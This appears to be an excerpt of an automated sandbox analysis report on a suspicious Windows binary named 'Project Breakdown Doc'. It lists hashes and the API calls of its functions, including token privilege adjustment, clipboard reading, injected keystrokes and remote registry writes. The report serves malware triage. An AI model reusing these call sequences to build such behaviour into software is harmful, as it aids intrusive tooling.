                                                  • Opcode Fuzzy Hash: 4452e55a8b685f6b8da864ff930c344d93f1ef39176dc4d0e8b3438b7e5ea24e
                                                  • Instruction Fuzzy Hash: 80427870204341AFD725CF68C884FAABBE6FF49314F14452DF6AA876A0C731E951DB92
                                                  APIs
                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CC873F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 3850602802-328681919
                                                  • Opcode ID: 49b66c8c88dd574c8dd75046f1f8c13b0d0af16d0c3f0ec614dad466a1a7261b
                                                  • Instruction ID: 401f9685f488ab395868f3d0d516244b3c0811136bda3aa118d2a7217d74e8b6
                                                  • Opcode Fuzzy Hash: 49b66c8c88dd574c8dd75046f1f8c13b0d0af16d0c3f0ec614dad466a1a7261b
                                                  • Instruction Fuzzy Hash: B612C171500248ABEB258F25CC89FAF7BB9EF85710F24412DF915EA2E1EF749A45CB10
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_memset
                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                  • API String ID: 1357608183-1798697756
                                                  • Opcode ID: c445389cd416a41991edf3c4269e1ea446f3deca373e5f9cb1dcb08dadc56cf5
                                                  • Instruction ID: 65ce40f03f2cc99157ba4b6f2b1d3e782bc24fe85a9997f3a01069f53659466d
                                                  • Opcode Fuzzy Hash: c445389cd416a41991edf3c4269e1ea446f3deca373e5f9cb1dcb08dadc56cf5
                                                  • Instruction Fuzzy Hash: D193A075A00219DBDF24CF98D885BADB7B1FF48310F25816AE955EB280E7709EC2CB44
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00C44A3D
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C7DA8E
                                                  • IsIconic.USER32(?), ref: 00C7DA97
                                                  • ShowWindow.USER32(?,00000009), ref: 00C7DAA4
                                                  • SetForegroundWindow.USER32(?), ref: 00C7DAAE
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7DAC4
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C7DACB
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7DAD7
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C7DAE8
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C7DAF0
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C7DAF8
                                                  • SetForegroundWindow.USER32(?), ref: 00C7DAFB
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7DB10
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C7DB1B
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7DB25
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C7DB2A
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7DB33
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C7DB38
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7DB42
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C7DB47
                                                  • SetForegroundWindow.USER32(?), ref: 00C7DB4A
                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 00C7DB71
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: f5303452e3bcba0fe8ed0d2b5867bb0e9c88f7416272d6dd6c87adc189032a8a
                                                  • Instruction ID: 06820b8353d8778c0f1a70ee57addcba1e46b775d0710a83b34b26642c433d55
                                                  • Opcode Fuzzy Hash: f5303452e3bcba0fe8ed0d2b5867bb0e9c88f7416272d6dd6c87adc189032a8a
                                                  • Instruction Fuzzy Hash: 9A315271A40318BBEB216F62DC49F7E7E7DEF44B60F114069FA05EA1D0C6B05951ABA0
                                                  APIs
                                                    • Part of subcall function 00C98CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C98D0D
                                                    • Part of subcall function 00C98CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C98D3A
                                                    • Part of subcall function 00C98CC3: GetLastError.KERNEL32 ref: 00C98D47
                                                  • _memset.LIBCMT ref: 00C9889B
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C988ED
                                                  • CloseHandle.KERNEL32(?), ref: 00C988FE
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C98915
                                                  • GetProcessWindowStation.USER32 ref: 00C9892E
                                                  • SetProcessWindowStation.USER32(00000000), ref: 00C98938
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C98952
                                                    • Part of subcall function 00C98713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C98851), ref: 00C98728
                                                    • Part of subcall function 00C98713: CloseHandle.KERNEL32(?,?,00C98851), ref: 00C9873A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: aad23a2b89bb7914240e417787f72da620036d374220e8a64dd6e00cc2d7b165
                                                  • Instruction ID: 435864861cd2cc139e3cfd78a2f1535a24b49224a7d77deeb38864908255a7a2
                                                  • Opcode Fuzzy Hash: aad23a2b89bb7914240e417787f72da620036d374220e8a64dd6e00cc2d7b165
                                                  • Instruction Fuzzy Hash: 36813B71900249AFDF11DFA4DC49AEE7BB9EF05314F18416AF920A7161DF318E19EB60
                                                  APIs
                                                  • OpenClipboard.USER32(00CCF910), ref: 00CB4284
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CB4292
                                                  • GetClipboardData.USER32(0000000D), ref: 00CB429A
                                                  • CloseClipboard.USER32 ref: 00CB42A6
                                                  • GlobalLock.KERNEL32(00000000), ref: 00CB42C2
                                                  • CloseClipboard.USER32 ref: 00CB42CC
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00CB42E1
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00CB42EE
                                                  • GetClipboardData.USER32(00000001), ref: 00CB42F6
                                                  • GlobalLock.KERNEL32(00000000), ref: 00CB4303
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00CB4337
                                                  • CloseClipboard.USER32 ref: 00CB4447
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                  • String ID:
                                                  • API String ID: 3222323430-0
                                                  • Opcode ID: 4f5f8b9b8acec0faa685f03542a50cdf8eee5b333a60e8eb02f8900e1d124f8f
                                                  • Instruction ID: 4cce39f96d8120ef28a60cf96da80135abbaf24cd7d7fb2852af60b67e7a6255
                                                  • Opcode Fuzzy Hash: 4f5f8b9b8acec0faa685f03542a50cdf8eee5b333a60e8eb02f8900e1d124f8f
                                                  • Instruction Fuzzy Hash: 7651A031208301ABD715EF64DC86FAF77A9AF84B00F00452DF596D21E2DF70DA06AB62
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00CAC9F8
                                                  • FindClose.KERNEL32(00000000), ref: 00CACA4C
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CACA71
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CACA88
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CACAAF
                                                  • __swprintf.LIBCMT ref: 00CACAFB
                                                  • __swprintf.LIBCMT ref: 00CACB3E
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • __swprintf.LIBCMT ref: 00CACB92
                                                    • Part of subcall function 00C638D8: __woutput_l.LIBCMT ref: 00C63931
                                                  • __swprintf.LIBCMT ref: 00CACBE0
                                                    • Part of subcall function 00C638D8: __flsbuf.LIBCMT ref: 00C63953
                                                    • Part of subcall function 00C638D8: __flsbuf.LIBCMT ref: 00C6396B
                                                  • __swprintf.LIBCMT ref: 00CACC2F
                                                  • __swprintf.LIBCMT ref: 00CACC7E
                                                  • __swprintf.LIBCMT ref: 00CACCCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: 18ea62a88d47a28338844fc994761213e50e71926bc9b71847ea9bd353227b0e
                                                  • Instruction ID: ad9aee72558d8f8e7dd12fbd293da56f4aabd9c0700c191d0438349ccbb07b18
                                                  • Opcode Fuzzy Hash: 18ea62a88d47a28338844fc994761213e50e71926bc9b71847ea9bd353227b0e
                                                  • Instruction Fuzzy Hash: 70A13DB1508315ABC710EBA4C885EAFB7ECFF99704F404929F596C3191EB34DA09DB62
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CAF221
                                                  • _wcscmp.LIBCMT ref: 00CAF236
                                                  • _wcscmp.LIBCMT ref: 00CAF24D
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00CAF25F
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00CAF279
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00CAF291
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF29C
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00CAF2B8
                                                  • _wcscmp.LIBCMT ref: 00CAF2DF
                                                  • _wcscmp.LIBCMT ref: 00CAF2F6
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00CAF308
                                                  • SetCurrentDirectoryW.KERNEL32(00CFA5A0), ref: 00CAF326
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CAF330
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF33D
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF34F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: 912e2b1d88792e76b659d6bc72b553c58b4d9fc5d5a879a1470f9068212ee5b6
                                                  • Instruction ID: c0a12bef4bb10e2f15d008db81b00ee28e9e5d2eddb05e261bdf71a4a840e704
                                                  • Opcode Fuzzy Hash: 912e2b1d88792e76b659d6bc72b553c58b4d9fc5d5a879a1470f9068212ee5b6
                                                  • Instruction Fuzzy Hash: C731C17650120A6ACF20DBF0DC88FEEB3AC9F4A325F14427DE914D30A0EB70DA468A50
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0BDE
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CCF910,00000000,?,00000000,?,?), ref: 00CC0C4C
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CC0C94
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CC0D1D
                                                  • RegCloseKey.ADVAPI32(?), ref: 00CC103D
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00CC104A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: 30d5765e1cd7bcd02b465ec8181a9e13f83705ad0f1883c882e95701b150d6a5
                                                  • Instruction ID: fea9f8793c3e0fa1f6d2d0d5737a1f0e74a1c2e05cc427931e8800a29876588f
                                                  • Opcode Fuzzy Hash: 30d5765e1cd7bcd02b465ec8181a9e13f83705ad0f1883c882e95701b150d6a5
                                                  • Instruction Fuzzy Hash: 5E0279752006519FCB14EF25C891E2AB7E5FF89714F04885DF99A9B3A2CB30ED41DB82
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CAF37E
                                                  • _wcscmp.LIBCMT ref: 00CAF393
                                                  • _wcscmp.LIBCMT ref: 00CAF3AA
                                                    • Part of subcall function 00CA45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CA45DC
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00CAF3D9
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF3E4
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00CAF400
                                                  • _wcscmp.LIBCMT ref: 00CAF427
                                                  • _wcscmp.LIBCMT ref: 00CAF43E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00CAF450
                                                  • SetCurrentDirectoryW.KERNEL32(00CFA5A0), ref: 00CAF46E
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CAF478
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF485
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF497
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 484ac238346ec9f8bf55c2e5a24b21aafd7eb578428b4fa769ce4a6190c688c2
                                                  • Instruction ID: 51cc586a88bfc1c8cc50044f5cda65995658534c47edbb23b62bc293b01499bd
                                                  • Opcode Fuzzy Hash: 484ac238346ec9f8bf55c2e5a24b21aafd7eb578428b4fa769ce4a6190c688c2
                                                  • Instruction Fuzzy Hash: 7D31C67150111E6FCF109BA4DC88FEE77AD9F4A368F140279E914A20A0D730DF46DA64
                                                  APIs
                                                    • Part of subcall function 00C9874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C98766
                                                    • Part of subcall function 00C9874A: GetLastError.KERNEL32(?,00C9822A,?,?,?), ref: 00C98770
                                                    • Part of subcall function 00C9874A: GetProcessHeap.KERNEL32(00000008,?,?,00C9822A,?,?,?), ref: 00C9877F
                                                    • Part of subcall function 00C9874A: HeapAlloc.KERNEL32(00000000,?,00C9822A,?,?,?), ref: 00C98786
                                                    • Part of subcall function 00C9874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C9879D
                                                    • Part of subcall function 00C987E7: GetProcessHeap.KERNEL32(00000008,00C98240,00000000,00000000,?,00C98240,?), ref: 00C987F3
                                                    • Part of subcall function 00C987E7: HeapAlloc.KERNEL32(00000000,?,00C98240,?), ref: 00C987FA
                                                    • Part of subcall function 00C987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C98240,?), ref: 00C9880B
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C9825B
                                                  • _memset.LIBCMT ref: 00C98270
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9828F
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C982A0
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C982DD
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C982F9
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C98316
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C98325
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C9832C
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9834D
                                                  • CopySid.ADVAPI32(00000000), ref: 00C98354
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C98385
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C983AB
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C983BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 9c34adff1ecdb791654fd70cbdf50d1cc51ae37ae639cae9af1fac3917cc1c2b
                                                  • Instruction ID: 16bf70602653c6a868a9cb8377223dd49c88b4da38b03723689e349a8a27d861
                                                  • Opcode Fuzzy Hash: 9c34adff1ecdb791654fd70cbdf50d1cc51ae37ae639cae9af1fac3917cc1c2b
                                                  • Instruction Fuzzy Hash: 0E613D71904209AFDF109F94DC49EAEBBB9FF05700F148169F825A72A1DB359A09CB60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                  • API String ID: 0-4052911093
                                                  • Opcode ID: 9289df07f666fecc6e421360c7799960b18e342537e37d75a129b129bb4ff118
                                                  • Instruction ID: 028060a62c5b8bda90c38c95a0e2a139651a33ea245d8912db4402a6ba41e38b
                                                  • Opcode Fuzzy Hash: 9289df07f666fecc6e421360c7799960b18e342537e37d75a129b129bb4ff118
                                                  • Instruction Fuzzy Hash: BE72A175E0021A8BDF24CF59C8857AEB7B5FF48310F54816AEC59EB280DB309E85DB94
                                                  APIs
                                                  • __lock.LIBCMT ref: 00C741AF
                                                    • Part of subcall function 00C69E4B: __mtinitlocknum.LIBCMT ref: 00C69E5D
                                                    • Part of subcall function 00C69E4B: EnterCriticalSection.KERNEL32(00000000,?,00C69CBC,0000000D), ref: 00C69E76
                                                  • ____lc_codepage_func.LIBCMT ref: 00C741F6
                                                  • __getenv_helper_nolock.LIBCMT ref: 00C74217
                                                  • _free.LIBCMT ref: 00C7424A
                                                    • Part of subcall function 00C62F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C69C64), ref: 00C62FA9
                                                    • Part of subcall function 00C62F95: GetLastError.KERNEL32(00000000,?,00C69C64), ref: 00C62FBB
                                                  • _strlen.LIBCMT ref: 00C74251
                                                  • __malloc_crt.LIBCMT ref: 00C74258
                                                  • _strlen.LIBCMT ref: 00C74276
                                                  • __invoke_watson.LIBCMT ref: 00C74299
                                                  • _free.LIBCMT ref: 00C742A8
                                                  • GetTimeZoneInformation.KERNEL32(00D04AF8,00000000,00000000,00000000,00000000,00000000,00CFC070,00000030,00C73F3B,00CFC050,00000008,00C670B8), ref: 00C742B9
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00D04AFC,000000FF,?,0000003F,00000000,?), ref: 00C74332
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00D04B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 00C7436B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone____lc_codepage_func__getenv_helper_nolock__invoke_watson__lock__malloc_crt__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2302051780-0
                                                  • Opcode ID: f0d8a206ad2dabd6275ad7591d20f24ae7c47b7e0b8495396869a19f001c4cdf
                                                  • Instruction ID: 13c080d11eb8ea2c1736dedd34366d7cb1ed70fe24d5131859dc1975a2f717e6
                                                  • Opcode Fuzzy Hash: f0d8a206ad2dabd6275ad7591d20f24ae7c47b7e0b8495396869a19f001c4cdf
                                                  • Instruction Fuzzy Hash: 35A1B1B1D002459EDF199FA9D881BADBBB8BF09710F14811AF52CF72A1D7348E41EB24
                                                  APIs
                                                    • Part of subcall function 00CC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC0038,?,?), ref: 00CC10BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0737
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
